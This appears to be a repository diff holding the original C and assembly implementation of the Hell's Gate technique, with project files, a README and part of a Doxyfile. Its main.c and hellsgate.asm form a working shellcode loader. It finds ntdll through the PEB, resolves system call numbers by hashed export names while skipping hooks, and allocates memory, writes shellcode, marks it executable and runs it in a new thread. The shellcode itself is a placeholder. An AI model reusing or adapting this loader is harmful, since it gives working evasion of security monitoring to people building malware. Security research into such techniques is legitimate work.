<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="structs.h" />
</ItemGroup>
<ItemGroup>
<MASM Include="hellsgate.asm">
<FileType>Document</FileType>
</MASM>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

@ -0,0 +1,32 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="structs.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<MASM Include="hellsgate.asm">
<Filter>Source Files</Filter>
</MASM>
</ItemGroup>
</Project>

@ -0,0 +1,23 @@
; Hell's Gate
; Dynamic system call invocation
;
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
.data
wSystemCall DWORD 000h
.code
HellsGate PROC
mov wSystemCall, 000h
mov wSystemCall, ecx
ret
HellsGate ENDP
HellDescent PROC
mov r10, rcx
mov eax, wSystemCall
syscall
ret
HellDescent ENDP
end

@ -0,0 +1,211 @@
#pragma once
#include <Windows.h>
#include "structs.h"
/*--------------------------------------------------------------------
VX Tables
--------------------------------------------------------------------*/
typedef struct _VX_TABLE_ENTRY {
PVOID pAddress;
DWORD64 dwHash;
WORD wSystemCall;
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
typedef struct _VX_TABLE {
VX_TABLE_ENTRY NtAllocateVirtualMemory;
VX_TABLE_ENTRY NtProtectVirtualMemory;
VX_TABLE_ENTRY NtCreateThreadEx;
VX_TABLE_ENTRY NtWaitForSingleObject;
} VX_TABLE, * PVX_TABLE;
/*--------------------------------------------------------------------
Function prototypes.
--------------------------------------------------------------------*/
PTEB RtlGetThreadEnvironmentBlock();
BOOL GetImageExportDirectory(
_In_ PVOID pModuleBase,
_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
);
BOOL GetVxTableEntry(
_In_ PVOID pModuleBase,
_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
_In_ PVX_TABLE_ENTRY pVxTableEntry
);
BOOL Payload(
_In_ PVX_TABLE pVxTable
);
PVOID VxMoveMemory(
_Inout_ PVOID dest,
_In_ const PVOID src,
_In_ SIZE_T len
);
/*--------------------------------------------------------------------
External functions' prototype.
--------------------------------------------------------------------*/
extern VOID HellsGate(WORD wSystemCall);
extern HellDescent();
INT wmain() {
PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
return 0x1;
// Get NTDLL module
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
// Get the EAT of NTDLL
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
return 0x01;
VX_TABLE Table = { 0 };
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
return 0x1;
Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
return 0x1;
Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
return 0x1;
Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
return 0x1;
Payload(&Table);
return 0x00;
}
PTEB RtlGetThreadEnvironmentBlock() {
#if _WIN64
return (PTEB)__readgsqword(0x30);
#else
return (PTEB)__readfsdword(0x16);
#endif
}
DWORD64 djb2(PBYTE str) {
DWORD64 dwHash = 0x7734773477347734;
INT c;
while (c = *str++)
dwHash = ((dwHash << 0x5) + dwHash) + c;
return dwHash;
}
BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
// Get DOS header
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
return FALSE;
}
// Get NT headers
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
return FALSE;
}
// Get the EAT
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
return TRUE;
}
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
pVxTableEntry->pAddress = pFunctionAddress;
// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
// check if syscall, in this case we are too far
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
// First opcodes should be :
// MOV R10, RCX
// MOV RCX, <syscall>
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
break;
}
cw++;
};
}
}
return TRUE;
}
BOOL Payload(PVX_TABLE pVxTable) {
NTSTATUS status = 0x00000000;
char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
// Allocate memory for the shellcode
PVOID lpAddress = NULL;
SIZE_T sDataSize = sizeof(shellcode);
HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
// Write Memory
VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
// Change page permissions
ULONG ulOldProtect = 0;
HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
// Create thread
HANDLE hHostThread = INVALID_HANDLE_VALUE;
HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
// Wait for 1 seconds
LARGE_INTEGER Timeout;
Timeout.QuadPart = -10000000;
HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
status = HellDescent(hHostThread, FALSE, &Timeout);
return TRUE;
}
PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
char* d = dest;
const char* s = src;
if (d < s)
while (len--)
*d++ = *s++;
else {
char* lasts = s + (len - 1);
char* lastd = d + (len - 1);
while (len--)
*lastd-- = *lasts--;
}
return dest;
}

@ -0,0 +1,337 @@
#pragma once
#include <Windows.h>
/*--------------------------------------------------------------------
STRUCTURES
--------------------------------------------------------------------*/
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
typedef struct _LDR_MODULE {
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID BaseAddress;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_MODULE, * PLDR_MODULE;
typedef struct _PEB_LDR_DATA {
ULONG Length;
ULONG Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
BOOLEAN Spare;
HANDLE Mutant;
PVOID ImageBase;
PPEB_LDR_DATA LoaderData;
PVOID ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PVOID FastPebLock;
PVOID FastPebLockRoutine;
PVOID FastPebUnlockRoutine;
ULONG EnvironmentUpdateCount;
PVOID* KernelCallbackTable;
PVOID EventLogSection;
PVOID EventLog;
PVOID FreeList;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[0x2];
PVOID ReadOnlySharedMemoryBase;
PVOID ReadOnlySharedMemoryHeap;
PVOID* ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
BYTE Spare2[0x4];
LARGE_INTEGER CriticalSectionTimeout;
ULONG HeapSegmentReserve;
ULONG HeapSegmentCommit;
ULONG HeapDeCommitTotalFreeThreshold;
ULONG HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PVOID** ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
PVOID GdiDCAttributeList;
PVOID LoaderLock;
ULONG OSMajorVersion;
ULONG OSMinorVersion;
ULONG OSBuildNumber;
ULONG OSPlatformId;
ULONG ImageSubSystem;
ULONG ImageSubSystemMajorVersion;
ULONG ImageSubSystemMinorVersion;
ULONG GdiHandleBuffer[0x22];
ULONG PostProcessInitRoutine;
ULONG TlsExpansionBitmap;
BYTE TlsExpansionBitmapBits[0x80];
ULONG SessionId;
} PEB, * PPEB;
typedef struct __CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
ULONG Flags;
PCHAR FrameName;
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
typedef struct _TEB_ACTIVE_FRAME {
ULONG Flags;
struct _TEB_ACTIVE_FRAME* Previous;
PTEB_ACTIVE_FRAME_CONTEXT Context;
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
typedef struct _GDI_TEB_BATCH {
ULONG Offset;
ULONG HDC;
ULONG Buffer[310];
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
typedef PVOID PACTIVATION_CONTEXT;
typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
PACTIVATION_CONTEXT ActivationContext;
ULONG Flags;
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
typedef struct _ACTIVATION_CONTEXT_STACK {
PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
LIST_ENTRY FrameListCache;
ULONG Flags;
ULONG NextCookieSequenceNumber;
ULONG StackId;
} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
typedef struct _TEB {
NT_TIB NtTib;
PVOID EnvironmentPointer;
CLIENT_ID ClientId;
PVOID ActiveRpcHandle;
PVOID ThreadLocalStoragePointer;
PPEB ProcessEnvironmentBlock;
ULONG LastErrorValue;
ULONG CountOfOwnedCriticalSections;
PVOID CsrClientThread;
PVOID Win32ThreadInfo;
ULONG User32Reserved[26];
ULONG UserReserved[5];
PVOID WOW32Reserved;
LCID CurrentLocale;
ULONG FpSoftwareStatusRegister;
PVOID SystemReserved1[54];
LONG ExceptionCode;
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
ULONG TxFsContext;
#elif (NTDDI_VERSION >= NTDDI_WS03)
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
#else
ACTIVATION_CONTEXT_STACK ActivationContextStack;
UCHAR SpareBytes1[24];
#endif
GDI_TEB_BATCH GdiTebBatch;
CLIENT_ID RealClientId;
PVOID GdiCachedProcessHandle;
ULONG GdiClientPID;
ULONG GdiClientTID;
PVOID GdiThreadLocalInfo;
PSIZE_T Win32ClientInfo[62];
PVOID glDispatchTable[233];
PSIZE_T glReserved1[29];
PVOID glReserved2;
PVOID glSectionInfo;
PVOID glSection;
PVOID glTable;
PVOID glCurrentRC;
PVOID glContext;
NTSTATUS LastStatusValue;
UNICODE_STRING StaticUnicodeString;
WCHAR StaticUnicodeBuffer[261];
PVOID DeallocationStack;
PVOID TlsSlots[64];
LIST_ENTRY TlsLinks;
PVOID Vdm;
PVOID ReservedForNtRpc;
PVOID DbgSsReserved[2];
#if (NTDDI_VERSION >= NTDDI_WS03)
ULONG HardErrorMode;
#else
ULONG HardErrorsAreDisabled;
#endif
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
GUID ActivityId;
PVOID SubProcessTag;
PVOID EtwLocalData;
PVOID EtwTraceData;
#elif (NTDDI_VERSION >= NTDDI_WS03)
PVOID Instrumentation[14];
PVOID SubProcessTag;
PVOID EtwLocalData;
#else
PVOID Instrumentation[16];
#endif
PVOID WinSockData;
ULONG GdiBatchCount;
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
BOOLEAN SpareBool0;
BOOLEAN SpareBool1;
BOOLEAN SpareBool2;
#else
BOOLEAN InDbgPrint;
BOOLEAN FreeStackOnTermination;
BOOLEAN HasFiberData;
#endif
UCHAR IdealProcessor;
#if (NTDDI_VERSION >= NTDDI_WS03)
ULONG GuaranteedStackBytes;
#else
ULONG Spare3;
#endif
PVOID ReservedForPerf;
PVOID ReservedForOle;
ULONG WaitingOnLoaderLock;
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID SavedPriorityState;
ULONG_PTR SoftPatchPtr1;
ULONG_PTR ThreadPoolData;
#elif (NTDDI_VERSION >= NTDDI_WS03)
ULONG_PTR SparePointer1;
ULONG_PTR SoftPatchPtr1;
ULONG_PTR SoftPatchPtr2;
#else
Wx86ThreadState Wx86Thread;
#endif
PVOID* TlsExpansionSlots;
#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
PVOID DeallocationBStore;
PVOID BStoreLimit;
#endif
ULONG ImpersonationLocale;
ULONG IsImpersonating;
PVOID NlsCache;
PVOID pShimData;
ULONG HeapVirtualAffinity;
HANDLE CurrentTransactionHandle;
PTEB_ACTIVE_FRAME ActiveFrame;
#if (NTDDI_VERSION >= NTDDI_WS03)
PVOID FlsData;
#endif
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID PreferredLangauges;
PVOID UserPrefLanguages;
PVOID MergedPrefLanguages;
ULONG MuiImpersonation;
union
{
struct
{
USHORT SpareCrossTebFlags : 16;
};
USHORT CrossTebFlags;
};
union
{
struct
{
USHORT DbgSafeThunkCall : 1;
USHORT DbgInDebugPrint : 1;
USHORT DbgHasFiberData : 1;
USHORT DbgSkipThreadAttach : 1;
USHORT DbgWerInShipAssertCode : 1;
USHORT DbgIssuedInitialBp : 1;
USHORT DbgClonedThread : 1;
USHORT SpareSameTebBits : 9;
};
USHORT SameTebFlags;
};
PVOID TxnScopeEntercallback;
PVOID TxnScopeExitCAllback;
PVOID TxnScopeContext;
ULONG LockCount;
ULONG ProcessRundown;
ULONG64 LastSwitchTime;
ULONG64 TotalSwitchOutTime;
LARGE_INTEGER WaitReasonBitMap;
#else
BOOLEAN SafeThunkCall;
BOOLEAN BooleanSpare[3];
#endif
} TEB, * PTEB;
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
WORD LoadCount;
WORD TlsIndex;
union {
LIST_ENTRY HashLinks;
struct {
PVOID SectionPointer;
ULONG CheckSum;
};
};
union {
ULONG TimeDateStamp;
PVOID LoadedImports;
};
PACTIVATION_CONTEXT EntryPointActivationContext;
PVOID PatchInformation;
LIST_ENTRY ForwarderLinks;
LIST_ENTRY ServiceTagLinks;
LIST_ENTRY StaticLinks;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
PVOID RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _INITIAL_TEB {
PVOID StackBase;
PVOID StackLimit;
PVOID StackCommit;
PVOID StackCommitMax;
PVOID StackReserved;
} INITIAL_TEB, * PINITIAL_TEB;

@ -0,0 +1,21 @@
## Hell's Gate ##
Original C Implementation of the Hell's Gate VX Technique
<br />
<br />
Link to the paper: https://vxug.fakedoma.in/papers/hells-gate.pdf
<br /> PDF also included in this repository.
<br />
<br />
Authors:
* Paul Laîné (@am0nsec)
* smelly__vx (@RtlMateusz)
<br />
### Update ###
Please note:
* We are not claiming that this is ground-breaking as many people have been using this kind of technique for many years;
* We are not claiming that this is the perfect and most optimised way to archive the objective. This is just one example on how to implementation the technique;
* Judging the idea/technique/project/research solely on the name is petty to say the least and definitively childish; and
* Any recommendation and/or ideas will always be welcome, just open an issue in this repository.

@ -0,0 +1,385 @@
# Doxyfile 1.8.18
#---------------------------------------------------------------------------
# Project related configuration options
#---------------------------------------------------------------------------
DOXYFILE_ENCODING = UTF-8
PROJECT_NAME = "Shap Hell's Gate"
PROJECT_NUMBER = 1.0
PROJECT_BRIEF = "C# Implementation of the Hell's Gate VX Technique"
PROJECT_LOGO =
OUTPUT_DIRECTORY = ./doc/
CREATE_SUBDIRS = YES
ALLOW_UNICODE_NAMES = NO
OUTPUT_LANGUAGE = English
OUTPUT_TEXT_DIRECTION = None
BRIEF_MEMBER_DESC = YES
REPEAT_BRIEF = YES
ABBREVIATE_BRIEF = "The $name class" \
"The $name widget" \
"The $name file" \
is \
provides \
specifies \
contains \
represents \
a \
an \
the
ALWAYS_DETAILED_SEC = NO
INLINE_INHERITED_MEMB = NO
FULL_PATH_NAMES = YES
STRIP_FROM_PATH =
STRIP_FROM_INC_PATH =
SHORT_NAMES = NO
JAVADOC_AUTOBRIEF = NO
JAVADOC_BANNER = NO
QT_AUTOBRIEF = NO
MULTILINE_CPP_IS_BRIEF = NO
INHERIT_DOCS = YES
SEPARATE_MEMBER_PAGES = NO
TAB_SIZE = 4
ALIASES =
OPTIMIZE_OUTPUT_FOR_C = NO
OPTIMIZE_OUTPUT_JAVA = NO